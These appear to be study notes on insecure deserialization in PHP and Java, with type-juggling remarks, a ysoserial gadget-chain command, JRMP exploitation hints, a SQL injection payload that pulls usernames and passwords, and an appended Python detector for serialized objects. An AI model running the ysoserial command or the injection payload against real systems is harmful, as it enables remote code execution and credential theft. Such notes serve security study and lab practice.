Insecure Deserialization
** base64 encoding with delimiters \00 can also be used?
PHP
- Anatomy of a serialize()'d value:
  O:<length of classname>:"<classname>":<number of properties>:{s:<length>:"<property>";s:<length>:"<value>";s:<length>:"<property>";b:1;}
- Methods: serialize(), unserialize()
- Loose comparison (==) with type juggling: a non-numeric string is cast to an integer taken from its leading digits, or 0 if it has none (PHP 8 changed this, so 0 == "abc" is false there).
  0 == "passwordAbcd" is true
  9 == "a9sbv6bk2d9naeeoch2yffy2fp6zfz13" is false (the string starts with a letter, so it is cast to 0, not 9)
- Magic methods: __construct, __destruct, __sleep (called during serialization), __wakeup (called during deserialization)
- Gadget chain for Apache Commons Collections: java -jar ysoserial.jar CommonsCollections2 '<command>' | base64 | tr -d "\n"
- Check stack traces for PHP framework versions
- {"token":"=","sig_hmac_sha1":""}
Java
- A serialized Java object converted to Base64 starts with rO0 (the stream header AC ED 00 05 encodes to rO0AB)
- Class and methods: java.io.Serializable, writeObject(), readObject()
- Magic method: ObjectInputStream.readObject()
- Universal detection in any Java version: the URLDNS chain triggers a DNS lookup
- If the target JRE is not patched with JEP 290: exploitation of RMI registries via JRMPClient and JRMPListener
- The transient keyword in Java excludes a field from serialization: any field of a class declared transient is not serialized.
- The package name of the gadget class is present in the binary serialized object.
- PostgreSQL injection: SELECT * FROM products WHERE id = '%s' LIMIT 1", id
  java PortswiggerGenericSD "' UNION SELECT '1','2','3',CAST((SELECT concat(username,':',password) from users LIMIT 1) as int),'5','6','7','8' --"
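A defender-side check, added here as an example and not part of the original notes: it flags request parameters that carry a Java serialization stream (AC ED 00 05, which reads rO0AB once base64-encoded) or a PHP serialize()'d object, raw or base64-wrapped, and extracts the PHP class name so it can be compared against an allow-list, the same idea as the allowed_classes option of PHP's unserialize(). Parameter names and values are constructed; the function names are my own.

```python
import base64
import binascii
import re

# Java serialization stream header: STREAM_MAGIC 0xACED followed by STREAM_VERSION 0x0005.
JAVA_MAGIC = b"\xac\xed\x00\x05"
# PHP object token as produced by serialize(): O:<classname length>:"<classname>":<property count>:{
PHP_OBJECT = re.compile(rb'O:(\d+):"([^"]*)":\d+:\{')


def strip_base64(value: bytes) -> bytes:
    """Return the decoded bytes when value is well-formed base64, else the value unchanged."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return value


def classify(value: bytes) -> dict:
    """Identify a serialized payload: {"format": "java" | "php" | None, "class": PHP class or None}."""
    for candidate in (value, strip_base64(value)):
        if candidate.startswith(JAVA_MAGIC):
            return {"format": "java", "class": None}
        match = PHP_OBJECT.search(candidate)
        # The declared length must match the class name; this weeds out look-alike text.
        if match and int(match.group(1)) == len(match.group(2)):
            return {"format": "php", "class": match.group(2).decode("utf-8", "replace")}
    return {"format": None, "class": None}


def scan_params(params: dict, allowed_php_classes=frozenset()) -> list:
    """Flag parameters carrying Java streams or PHP objects whose class is not allow-listed."""
    findings = []
    for name, value in params.items():
        result = classify(value.encode("utf-8") if isinstance(value, str) else value)
        if result["format"] == "java":
            findings.append((name, "java-serialized-object"))
        elif result["format"] == "php" and result["class"] not in allowed_php_classes:
            findings.append((name, "php-object:" + result["class"]))
    return findings


# Constructed sample request parameters (not taken from any real application).
SAMPLE_PARAMS = {
    "session": base64.b64encode(b'O:4:"User":1:{s:4:"name";s:5:"alice";}').decode(),
    "state": base64.b64encode(JAVA_MAGIC + b"\x73\x72\x00\x0b").decode(),  # begins with rO0AB
    "page": "1",
}
```

Running scan_params(SAMPLE_PARAMS) reports both the PHP object and the Java stream; passing allowed_php_classes={"User"} leaves only the Java finding.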
Python
Ruby